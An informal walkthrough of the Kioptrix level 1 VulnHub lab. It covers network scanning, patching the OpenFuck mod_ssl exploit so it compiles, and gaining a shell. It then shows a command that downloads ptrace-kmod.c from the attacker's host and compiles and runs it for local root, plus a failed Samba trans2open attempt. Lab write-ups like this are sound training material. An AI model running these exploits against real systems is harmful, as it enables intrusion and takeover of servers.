First discover the machine with vboxnet0 interface

$ sudo netdiscover -i vboxnet0

 Currently scanning: Finished!   |   Our Mac is: 0a:00:27:00:00:00 - 0                       
                                                                                             
 3 Captured ARP Req/Rep packets, from 2 hosts.   Total size: 144                             
 _____________________________________________________________________________
   IP            At MAC Address      Count  Len   MAC Vendor                   
 ----------------------------------------------------------------------------- 
 192.168.56.100  08:00:27:0f:86:ca    01    060   CADMUS COMPUTER SYSTEMS                    
 192.168.56.102  08:00:27:d9:37:da    02    084   CADMUS COMPUTER SYSTEMS  

 our system is at 192.168.56.102

Let's take a look with nmap!

Starting Nmap 7.60 ( https://nmap.org ) at 2018-02-03 03:22 +03
Nmap scan report for 192.168.56.102
Host is up (0.0017s latency).
Not shown: 994 closed ports
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 2.9p2 (protocol 1.99)
80/tcp    open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b

111/tcp   open  rpcbind     2 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1          32768/tcp  status
|_  100024  1          32770/udp  status
139/tcp   open  netbios-ssn Samba smbd (workgroup: dMYGROUP)
443/tcp   open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
32768/tcp open  status      1 (RPC #100024)
MAC Address: 08:00:27:D9:37:DA (Oracle VirtualBox virtual NIC)

i quickly searched for apache vulnerabilities.

Key point is Apache version is 1.3.20 and mod_ssl/2.8.4, and we have Red Hat Linux.

I think we must use SSL overflow.
Found it and it didn't compiled. Then i worked on.

add these lines in first lines

#include <openssl/rc4.h>
#include <openssl/md5.h>

#define SSL2_MT_ERROR 0
#define SSL2_MT_CLIENT_FINISHED 3
#define SSL2_MT_SERVER_HELLO 4
#define SSL2_MT_SERVER_VERIFY 5
#define SSL2_MT_SERVER_FINISHED 6
#define SSL2_MAX_CONNECTION_ID_LENGTH 16

change if bla bla EVP_PKEY with
if (EVP_PKEY_get1_RSA(pkey) == NULL) {

Replace the "encrypted_key_length" code with:

encrypted_key_length = RSA_public_encrypt(RC4_KEY_LENGTH, ssl->master_key, &buf[10], EVP_PKEY_get1_RSA(pkey), RSA_PKCS1_PADDING);



Also my VM had no internet so, i used a simple http server on my main machine to get ptrace.c
"http://192.168.56.1:8000/ptrace-kmod.c"
like this.

ðŸ‘ ~/Belgeler/research/VULNHUB/Kioptrix/v1$ ./openfuck 0x6b 192.168.56.102 443 -c 50

*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena  irc.brasnet.org                                     *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

Connection... 50 of 50
Establishing SSL connection
cipher: 0x4043808c   ciphers: 0x80f81c8
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$ 
 gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; 192.168.56.1:8000/ptrace-kmod.c; 
--01:47:47--  http://192.168.56.1:8000/ptrace-kmod.c
           => `ptrace-kmod.c'
Connecting to 192.168.56.1:8000... connected!
HTTP request sent, awaiting response... 200 OK
Length: 3,921 [text/plain]

    0K ...                                                   100% @   3.74 MB/s

01:47:47 (3.74 MB/s) - `ptrace-kmod.c' saved [3921/3921]

[+] Attached to 6297
[+] Waiting for signal
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...
ls
p
ptrace.c
whoami
root

I tried to crack root password but 
it didnt finish, and I was bored.

Also i tried to exploit samba service.
Which has trans2open vulnerability, i guess...
But i have encountered with errors
Meterpreter session were dying always.
I dont know why.
I dont know why.

[-] 192.168.56.102:139 - Exploit failed: Interrupt 
[*] Exploit completed, but no session was created.

